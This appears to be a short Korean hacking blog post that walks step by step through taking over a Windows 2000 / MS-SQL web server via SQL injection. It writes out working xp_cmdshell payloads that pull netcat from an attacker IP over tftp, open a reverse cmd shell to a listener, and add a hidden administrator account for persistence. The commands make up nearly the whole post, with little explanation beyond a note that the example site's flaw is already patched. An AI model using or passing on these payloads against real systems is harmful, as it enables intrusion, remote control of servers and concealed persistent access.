728x90
웹 취약점을 이용하여 리버스 커넥션 수행 및 점령
1) 서버 컴퓨터의 정보
SQL Injection
- OS: windows2000
- DBMS: MS-SQL
- 확장프로시저:XP_CMDSHELL
2) NC 업로드(tftp이용)
- 'exec master.dbo.xp_cmdshell 'tftp -i 공격자ip get nc.exe 대상디렉토리\파일.exe' --
ex)
'exec master.dbo.xp_cmdshell 'tftp -i 163.152.110.135 get nc.exe c:\test\test.exe' --
3) 공격자 PC 대기상태 돌입
nc -lvp 임의의port
ex) nc -lvp 7777
4) 피해자 웹서버가 공격자에게 리버스 커넥션 수행
'exec master.dbo.xp_cmdshell 'c:\test\test.exe 공격자IP 7777 -e cmd' --
ex)
'exec master.dbo.xp_cmdshell 'c:\test\test.exe 163.152.110.135 7777 -e cmd' --
+) 은폐계정
net user id$ passwd /add
ex) net user secret$ 1234 /add
+) administrator 그룹 포함
net localgroup administrators id$ /add
ex) net localgroup administrators secret$ /add
등등 각종 명령어 수행 가능
웹 취약점은 해당 웹마다 다름 위의 사이트 취약점은 이미 보강된 취약점
'it > network' 카테고리의 다른 글
[BT5R2] 정상파일에 exploit 삽입하여 백도어(Back door) 감염시키기 (0) | 2013.08.07 |
---|---|
[BT5R2] wireshark 취약점 공격 (0) | 2013.07.30 |
[BT5R2] MS10_002_aurora 공격 (0) | 2013.07.30 |